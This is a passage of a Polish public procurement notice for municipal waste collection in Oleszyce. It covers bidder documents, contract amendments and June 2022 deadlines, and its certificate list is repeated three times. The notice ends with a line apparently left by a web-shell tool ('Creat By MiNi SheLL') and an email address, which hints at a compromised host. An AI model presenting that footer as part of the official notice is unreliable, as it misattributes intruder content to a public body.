zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. <br/> <br/>3.	Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania oświadczeń i zaświadczeń, o których mowa w pkt 2. <br/>4.	Zgodnie z art. 125 ust. 4 ustawy Pzp w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>5.	Zgodnie z art. 125 ust. 5 ustawy Pzp Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby. <br/>6.	Dokumenty Wykonawcy składa się w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym Wykonawcy <br/>(pełnomocnika).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu <br/>1. Wykonawca składa oświadczenie woli w postaci oferty, której wzór stanowi załącznik nr 4 do SWZ i dołącza do niej: <br/>1) oświadczenie o spełnianiu warunków oraz niepodleganiu wykluczeniu – wg wzoru stanowiącego załącznik nr 5 do SWZ; 2) pełnomocnictwo – jeżeli oferta wraz z oświadczeniem składana jest przez pełnomocnika. <br/> <br/>2.	Oświadczenia, zaświadczenia i dokumenty potwierdzające spełnianie warunków, o których mowa w rozdziale 5 – składane na wezwanie Zamawiającego: <br/>1)	oświadczenie o posiadaniu aktualnego wpisu do prowadzonego przez marszałka województwa właściwego dla siedzimy Wykonawcy rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami (BDO, Dział VII) w zakresie kodów odpadów komunalnych, objętych przedmiotem zamówienia – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>2)	oświadczenie o posiadaniu na czas trwania umowy polisy ubezpieczeniowej lub innego dokumentu potwierdzającego, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie realizacji umowy – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>Uwaga: w przypadku wątpliwości Zamawiający może zażądać okazania poświadczeń lub referencji poświadczających wykonanie wykazanych usług. <br/>3)	oświadczenie o dysponowaniu pojazdami – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>4)	oświadczenie o dysponowaniu bazą magazynowo - transportową – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>5)	oświadczenie dot. grupy kapitałowej – wg wzoru stanowiącego załącznik nr 7 do SWZ; <br/>6)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; <br/>7)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. <br/> <br/>3.	Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania oświadczeń i zaświadczeń, o których mowa w pkt 2. <br/>4.	Zgodnie z art. 125 ust. 4 ustawy Pzp w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>5.	Zgodnie z art. 125 ust. 5 ustawy Pzp Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1) oświadczenie o spełnianiu warunków oraz niepodleganiu wykluczeniu – wg wzoru stanowiącego załącznik nr 5 do SWZ; 2) pełnomocnictwo – jeżeli oferta wraz z oświadczeniem składana jest przez pełnomocnika. <br/> <br/>2.	Oświadczenia, zaświadczenia i dokumenty potwierdzające spełnianie warunków, o których mowa w rozdziale 5 – składane na wezwanie Zamawiającego: <br/>1)	oświadczenie o posiadaniu aktualnego wpisu do prowadzonego przez marszałka województwa właściwego dla siedzimy Wykonawcy rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami (BDO, Dział VII) w zakresie kodów odpadów komunalnych, objętych przedmiotem zamówienia – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>2)	oświadczenie o posiadaniu na czas trwania umowy polisy ubezpieczeniowej lub innego dokumentu potwierdzającego, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie realizacji umowy – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>Uwaga: w przypadku wątpliwości Zamawiający może zażądać okazania poświadczeń lub referencji poświadczających wykonanie wykazanych usług. <br/>3)	oświadczenie o dysponowaniu pojazdami – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>4)	oświadczenie o dysponowaniu bazą magazynowo - transportową – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>5)	oświadczenie dot. grupy kapitałowej – wg wzoru stanowiącego załącznik nr 7 do SWZ; <br/>6)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; <br/>7)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1) oświadczenie o spełnianiu warunków oraz niepodleganiu wykluczeniu – wg wzoru stanowiącego załącznik nr 5 do SWZ; 2) pełnomocnictwo – jeżeli oferta wraz z oświadczeniem składana jest przez pełnomocnika. <br/> <br/>2.	Oświadczenia, zaświadczenia i dokumenty potwierdzające spełnianie warunków, o których mowa w rozdziale 5 – składane na wezwanie Zamawiającego: <br/>1)	oświadczenie o posiadaniu aktualnego wpisu do prowadzonego przez marszałka województwa właściwego dla siedzimy Wykonawcy rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami (BDO, Dział VII) w zakresie kodów odpadów komunalnych, objętych przedmiotem zamówienia – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>2)	oświadczenie o posiadaniu na czas trwania umowy polisy ubezpieczeniowej lub innego dokumentu potwierdzającego, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie realizacji umowy – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>Uwaga: w przypadku wątpliwości Zamawiający może zażądać okazania poświadczeń lub referencji poświadczających wykonanie wykazanych usług. <br/>3)	oświadczenie o dysponowaniu pojazdami – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>4)	oświadczenie o dysponowaniu bazą magazynowo - transportową – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>5)	oświadczenie dot. grupy kapitałowej – wg wzoru stanowiącego załącznik nr 7 do SWZ; <br/>6)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; <br/>7)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany warunków umowy <br/>Zmiana treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej: <br/>1) zmiany wysokości wynagrodzenia Wykonawcy na skutek zmiany: <br/>a) obowiązującej stawki podatku VAT, <br/>b)	o 5% wysokości minimalnego wynagrodzenia za płacę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, <br/>c)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne; <br/>d)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych; <br/> 2) zmiana podmiotów, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne spełniające warunki określone w SWZ. Zmiana ta nie wymaga aneksu do umowy, a dla skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowany podmiot; <br/>3) zmiana częstotliwości odbioru odpadów. <br/> Zmiana warunków umowy jest również dopuszczalna na zasadzie art. 455 ust. 1 pkt 2–4 oraz ust. 2–4 ustawy Pzp. <br/>2.	Zamawiający dopuszcza również możliwość zmiany ustaleń w umowie w przypadku zmiany powszechnie obowiązujących przepisów prawa wpływających na zasady odbierania odpadów. <br/>3.	Powyższe zmiany stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią one jednak zobowiązania do wyrażenia takiej zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-20 15:15</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Urząd Miasta i Gminy Oleszyce, ul Rynek 1</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-21 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com